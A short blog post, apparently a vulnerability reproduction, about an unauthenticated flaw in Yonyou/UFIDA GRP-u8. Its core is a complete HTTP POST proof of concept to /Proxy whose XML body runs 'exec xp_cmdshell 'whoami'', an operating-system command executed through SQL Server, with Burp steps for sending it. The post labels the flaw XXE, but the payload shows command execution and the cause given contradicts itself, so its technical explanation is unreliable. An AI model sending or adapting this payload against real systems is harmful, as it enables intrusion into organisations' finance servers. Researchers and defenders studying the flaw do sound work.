0x00 vulnerability description
Yonyou GRP-u8 has an XXE vulnerability, which is caused by the fact that there is no external entity loading when the application parses the XML input, causing malicious external files to be loaded.
0x01 Vulnerability Exploitation Conditions
No need to log in
0x02 Vulnerability recurrence
POC:
POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
burp captures the packet, modify the url to /Proxy, and add the payload to the body
0x03 repair suggestion
Upgrade to the latest version
Please indicate: Adminxe's Blog » UFIDA GRP-u8 XXE Vulnerability Reproduction